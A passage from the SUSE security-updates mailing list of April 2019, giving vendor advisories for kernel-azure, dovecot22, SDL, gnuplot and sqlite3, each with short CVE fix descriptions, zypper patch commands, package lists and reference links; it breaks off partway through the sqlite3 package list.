(bnc#1012382). - x86: respect memory size limiting via mem= parameter (bsc#1117645). - x86/xen: dont add memory above max allowed allocation (bsc#1117645). - xen, cpu_hotplug: Prevent an out of bounds access (bsc#1065600). - xen: remove pre-xen3 fallback handlers (bsc#1065600). - xfrm6_tunnel: Fix spi check in __xfrm6_tunnel_alloc_spi (bnc#1012382). - xfrm: refine validation of template and selector families (bnc#1012382). - Yama: Check for pid death before checking ancestry (bnc#1012382). - xfs: remove filestream item xfs_inode reference (bsc#1127961). Special Instructions and Notes: Please reboot the system after installing this update. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-901=1 Package List: - SUSE Linux Enterprise Server 12-SP3 (x86_64): kernel-azure-4.4.176-4.25.1 kernel-azure-base-4.4.176-4.25.1 kernel-azure-base-debuginfo-4.4.176-4.25.1 kernel-azure-debuginfo-4.4.176-4.25.1 kernel-azure-debugsource-4.4.176-4.25.1 kernel-azure-devel-4.4.176-4.25.1 kernel-syms-azure-4.4.176-4.25.1 - SUSE Linux Enterprise Server 12-SP3 (noarch): kernel-devel-azure-4.4.176-4.25.1 kernel-source-azure-4.4.176-4.25.1 References: https://www.suse.com/security/cve/CVE-2017-18249.html https://www.suse.com/security/cve/CVE-2019-2024.html https://www.suse.com/security/cve/CVE-2019-3459.html https://www.suse.com/security/cve/CVE-2019-3460.html https://www.suse.com/security/cve/CVE-2019-6974.html https://www.suse.com/security/cve/CVE-2019-7221.html https://www.suse.com/security/cve/CVE-2019-7222.html https://www.suse.com/security/cve/CVE-2019-9213.html https://bugzilla.suse.com/1012382 https://bugzilla.suse.com/1020413 https://bugzilla.suse.com/1023175 https://bugzilla.suse.com/1031492 https://bugzilla.suse.com/1042286 https://bugzilla.suse.com/1050549 https://bugzilla.suse.com/1065600 https://bugzilla.suse.com/1070767 https://bugzilla.suse.com/1075697 https://bugzilla.suse.com/1078355 https://bugzilla.suse.com/1082943 https://bugzilla.suse.com/1086095 https://bugzilla.suse.com/1086652 https://bugzilla.suse.com/1087036 https://bugzilla.suse.com/1087092 https://bugzilla.suse.com/1090435 https://bugzilla.suse.com/1094823 https://bugzilla.suse.com/1099810 https://bugzilla.suse.com/1102875 https://bugzilla.suse.com/1102877 https://bugzilla.suse.com/1102879 https://bugzilla.suse.com/1102882 https://bugzilla.suse.com/1102896 https://bugzilla.suse.com/1102959 https://bugzilla.suse.com/1103429 https://bugzilla.suse.com/1105428 https://bugzilla.suse.com/1106061 https://bugzilla.suse.com/1106105 https://bugzilla.suse.com/1106929 https://bugzilla.suse.com/1107866 https://bugzilla.suse.com/1109137 https://bugzilla.suse.com/1109248 https://bugzilla.suse.com/1109695 https://bugzilla.suse.com/1114893 https://bugzilla.suse.com/1116345 https://bugzilla.suse.com/1116653 https://bugzilla.suse.com/1117108 https://bugzilla.suse.com/1117645 https://bugzilla.suse.com/1117744 https://bugzilla.suse.com/1119019 https://bugzilla.suse.com/1119680 https://bugzilla.suse.com/1119843 https://bugzilla.suse.com/1120017 https://bugzilla.suse.com/1120691 https://bugzilla.suse.com/1120722 https://bugzilla.suse.com/1120758 https://bugzilla.suse.com/1120902 https://bugzilla.suse.com/1121713 https://bugzilla.suse.com/1121726 https://bugzilla.suse.com/1121805 https://bugzilla.suse.com/1122650 https://bugzilla.suse.com/1122651 https://bugzilla.suse.com/1122779 https://bugzilla.suse.com/1122885 https://bugzilla.suse.com/1123321 https://bugzilla.suse.com/1123323 https://bugzilla.suse.com/1123357 https://bugzilla.suse.com/1123933 https://bugzilla.suse.com/1124166 https://bugzilla.suse.com/1124235 https://bugzilla.suse.com/1124728 https://bugzilla.suse.com/1124732 https://bugzilla.suse.com/1124735 https://bugzilla.suse.com/1124775 https://bugzilla.suse.com/1124777 https://bugzilla.suse.com/1124780 https://bugzilla.suse.com/1124811 https://bugzilla.suse.com/1125000 https://bugzilla.suse.com/1125014 https://bugzilla.suse.com/1125315 https://bugzilla.suse.com/1125446 https://bugzilla.suse.com/1125794 https://bugzilla.suse.com/1125796 https://bugzilla.suse.com/1125808 https://bugzilla.suse.com/1125809 https://bugzilla.suse.com/1125810 https://bugzilla.suse.com/1125892 https://bugzilla.suse.com/1126389 https://bugzilla.suse.com/1126772 https://bugzilla.suse.com/1126773 https://bugzilla.suse.com/1126805 https://bugzilla.suse.com/1127082 https://bugzilla.suse.com/1127155 https://bugzilla.suse.com/1127561 https://bugzilla.suse.com/1127725 https://bugzilla.suse.com/1127731 https://bugzilla.suse.com/1127961 https://bugzilla.suse.com/1128166 https://bugzilla.suse.com/1128452 https://bugzilla.suse.com/1128565 https://bugzilla.suse.com/1128696 https://bugzilla.suse.com/1128756 https://bugzilla.suse.com/1128893 https://bugzilla.suse.com/1129080 https://bugzilla.suse.com/1129179 https://bugzilla.suse.com/1129237 https://bugzilla.suse.com/1129238 https://bugzilla.suse.com/1129239 https://bugzilla.suse.com/1129240 https://bugzilla.suse.com/1129241 https://bugzilla.suse.com/1129413 https://bugzilla.suse.com/1129414 https://bugzilla.suse.com/1129415 https://bugzilla.suse.com/1129416 https://bugzilla.suse.com/1129417 https://bugzilla.suse.com/1129418 https://bugzilla.suse.com/1129419 https://bugzilla.suse.com/1129581 https://bugzilla.suse.com/1129770 https://bugzilla.suse.com/1129923 From sle-security-updates at lists.suse.com Mon Apr 8 07:30:52 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 8 Apr 2019 15:30:52 +0200 (CEST) Subject: SUSE-SU-2019:0900-1: important: Security update for dovecot22 Message-ID: <20190408133052.499D8F7BB@maintenance.suse.de> SUSE Security Update: Security update for dovecot22 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0900-1 Rating: important References: #1111789 #1123022 #1130116 Cross-References: CVE-2019-3814 CVE-2019-7524 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that solves two vulnerabilities and has one errata is now available. Description: This update for dovecot22 fixes the following issues: Security issues fixed: - CVE-2019-7524: Fixed an improper file handling which could result in stack overflow allowing local root escalation (bsc#1130116). - CVE-2019-3814: Fixed a vulnerability related to SSL client certificate authentication (bsc#1123022). Other issue fixed: - Fixed handling of command continuation(bsc#1111789) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-900=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-900=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-900=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-900=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-900=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-900=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-900=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-900=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-900=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-900=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-900=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-900=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 dovecot22-devel-2.2.31-19.14.2 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 dovecot22-devel-2.2.31-19.14.2 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 - SUSE Enterprise Storage 4 (x86_64): dovecot22-2.2.31-19.14.2 dovecot22-backend-mysql-2.2.31-19.14.2 dovecot22-backend-mysql-debuginfo-2.2.31-19.14.2 dovecot22-backend-pgsql-2.2.31-19.14.2 dovecot22-backend-pgsql-debuginfo-2.2.31-19.14.2 dovecot22-backend-sqlite-2.2.31-19.14.2 dovecot22-backend-sqlite-debuginfo-2.2.31-19.14.2 dovecot22-debuginfo-2.2.31-19.14.2 dovecot22-debugsource-2.2.31-19.14.2 References: https://www.suse.com/security/cve/CVE-2019-3814.html https://www.suse.com/security/cve/CVE-2019-7524.html https://bugzilla.suse.com/1111789 https://bugzilla.suse.com/1123022 https://bugzilla.suse.com/1130116 From sle-security-updates at lists.suse.com Mon Apr 8 07:33:54 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 8 Apr 2019 15:33:54 +0200 (CEST) Subject: SUSE-SU-2019:0899-1: moderate: Security update for SDL Message-ID: <20190408133354.71C55F7BB@maintenance.suse.de> SUSE Security Update: Security update for SDL ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0899-1 Rating: moderate References: #1124799 #1124800 #1124802 #1124803 #1124805 #1124806 #1124824 #1124825 #1124826 #1124827 #1125099 Cross-References: CVE-2019-7572 CVE-2019-7573 CVE-2019-7574 CVE-2019-7575 CVE-2019-7576 CVE-2019-7577 CVE-2019-7578 CVE-2019-7635 CVE-2019-7636 CVE-2019-7637 CVE-2019-7638 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 ______________________________________________________________________________ An update that fixes 11 vulnerabilities is now available. Description: This update for SDL fixes the following issues: Security issues fixed: - CVE-2019-7572: Fixed a buffer over-read in IMA_ADPCM_nibble in audio/SDL_wave.c.(bsc#1124806). - CVE-2019-7578: Fixed a heap-based buffer over-read in InitIMA_ADPCM in audio/SDL_wave.c (bsc#1125099). - CVE-2019-7576: Fixed heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (bsc#1124799). - CVE-2019-7573: Fixed a heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (bsc#1124805). - CVE-2019-7635: Fixed a heap-based buffer over-read in Blit1to4 in video/SDL_blit_1.c. (bsc#1124827). - CVE-2019-7636: Fixed a heap-based buffer over-read in SDL_GetRGB in video/SDL_pixels.c (bsc#1124826). - CVE-2019-7638: Fixed a heap-based buffer over-read in Map1toN in video/SDL_pixels.c (bsc#1124824). - CVE-2019-7574: Fixed a heap-based buffer over-read in IMA_ADPCM_decode in audio/SDL_wave.c (bsc#1124803). - CVE-2019-7575: Fixed a heap-based buffer overflow in MS_ADPCM_decode in audio/SDL_wave.c (bsc#1124802). - CVE-2019-7637: Fixed a heap-based buffer overflow in SDL_FillRect function in SDL_surface.c (bsc#1124825). - CVE-2019-7577: Fixed a buffer over read in SDL_LoadWAV_RW in audio/SDL_wave.c (bsc#1124800). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-899=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-899=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-899=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-899=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-899=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-899=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): SDL-debugsource-1.2.15-15.11.1 libSDL-devel-1.2.15-15.11.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): SDL-debugsource-1.2.15-15.11.1 libSDL-devel-1.2.15-15.11.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): SDL-debugsource-1.2.15-15.11.1 libSDL-1_2-0-1.2.15-15.11.1 libSDL-1_2-0-debuginfo-1.2.15-15.11.1 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): libSDL-1_2-0-32bit-1.2.15-15.11.1 libSDL-1_2-0-debuginfo-32bit-1.2.15-15.11.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): SDL-debugsource-1.2.15-15.11.1 libSDL-1_2-0-1.2.15-15.11.1 libSDL-1_2-0-debuginfo-1.2.15-15.11.1 - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64): libSDL-1_2-0-32bit-1.2.15-15.11.1 libSDL-1_2-0-debuginfo-32bit-1.2.15-15.11.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): SDL-debugsource-1.2.15-15.11.1 libSDL-1_2-0-1.2.15-15.11.1 libSDL-1_2-0-debuginfo-1.2.15-15.11.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): SDL-debugsource-1.2.15-15.11.1 libSDL-1_2-0-1.2.15-15.11.1 libSDL-1_2-0-debuginfo-1.2.15-15.11.1 References: https://www.suse.com/security/cve/CVE-2019-7572.html https://www.suse.com/security/cve/CVE-2019-7573.html https://www.suse.com/security/cve/CVE-2019-7574.html https://www.suse.com/security/cve/CVE-2019-7575.html https://www.suse.com/security/cve/CVE-2019-7576.html https://www.suse.com/security/cve/CVE-2019-7577.html https://www.suse.com/security/cve/CVE-2019-7578.html https://www.suse.com/security/cve/CVE-2019-7635.html https://www.suse.com/security/cve/CVE-2019-7636.html https://www.suse.com/security/cve/CVE-2019-7637.html https://www.suse.com/security/cve/CVE-2019-7638.html https://bugzilla.suse.com/1124799 https://bugzilla.suse.com/1124800 https://bugzilla.suse.com/1124802 https://bugzilla.suse.com/1124803 https://bugzilla.suse.com/1124805 https://bugzilla.suse.com/1124806 https://bugzilla.suse.com/1124824 https://bugzilla.suse.com/1124825 https://bugzilla.suse.com/1124826 https://bugzilla.suse.com/1124827 https://bugzilla.suse.com/1125099 From sle-security-updates at lists.suse.com Mon Apr 8 13:09:48 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 8 Apr 2019 21:09:48 +0200 (CEST) Subject: SUSE-SU-2019:0904-1: moderate: Security update for gnuplot Message-ID: <20190408190948.6ED92FF2D@maintenance.suse.de> SUSE Security Update: Security update for gnuplot ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0904-1 Rating: moderate References: #1117463 #1117464 #1117465 Cross-References: CVE-2018-19490 CVE-2018-19491 CVE-2018-19492 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for gnuplot fixes the following issues: Security issues fixed: - CVE-2018-19492: Fixed a buffer overflow in cairotrm_options function (bsc#1117463) - CVE-2018-19491: Fixed a buffer overlow in the PS_options function (bsc#1117464) - CVE-2018-19490: Fixed a heap-based buffer overflow in the df_generate_ascii_array_entry function (bsc#1117465) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-904=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64): gnuplot-5.2.2-3.3.29 gnuplot-debuginfo-5.2.2-3.3.29 gnuplot-debugsource-5.2.2-3.3.29 - SUSE Linux Enterprise Module for Server Applications 15 (noarch): gnuplot-doc-5.2.2-3.3.29 References: https://www.suse.com/security/cve/CVE-2018-19490.html https://www.suse.com/security/cve/CVE-2018-19491.html https://www.suse.com/security/cve/CVE-2018-19492.html https://bugzilla.suse.com/1117463 https://bugzilla.suse.com/1117464 https://bugzilla.suse.com/1117465 From sle-security-updates at lists.suse.com Tue Apr 9 07:09:51 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 9 Apr 2019 15:09:51 +0200 (CEST) Subject: SUSE-SU-2019:0913-1: moderate: Security update for sqlite3 Message-ID: <20190409130951.45A7B1012C@maintenance.suse.de> SUSE Security Update: Security update for sqlite3 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0913-1 Rating: moderate References: #1119687 #1131576 Cross-References: CVE-2018-20346 CVE-2018-20506 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 SUSE CaaS Platform ALL SUSE CaaS Platform 3.0 OpenStack Cloud Magnum Orchestration 7 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for sqlite3 fixes the following issues: Security issues fixed: - CVE-2018-20346: Fixed a remote code execution vulnerability in FTS3 (Magellan) (bsc#1119687). - CVE-2018-20506: Fixed an integer overflow when FTS3 extension is enabled (bsc#1131576). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-913=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-913=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-913=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-913=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-913=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-913=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-913=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-913=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-913=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-913=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-913=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-913=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-913=1 - SUSE CaaS Platform ALL: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. - SUSE CaaS Platform 3.0: To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way. - OpenStack Cloud Magnum Orchestration 7: zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-913=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-32bit-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 sqlite3-devel-3.8.10.2-9.3.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 sqlite3-devel-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (x86_64): libsqlite3-0-32bit-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-32bit-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): libsqlite3-0-32bit-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64): libsqlite3-0-32bit-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (s390x x86_64): libsqlite3-0-32bit-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-32bit-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-32bit-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): libsqlite3-0-3.8.10.2-9.3.1 libsqlite3-0-debuginfo-3.8.10.2-9.3.1 sqlite3-3.8.10.2-9.3.1 sqlite3-debuginfo-3.8.10.2-9.3.1 sqlite3-debugsource-3.8.10.2-9.3.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64): libsqlite3-0-32bit-3.8.10.2-9.3.1 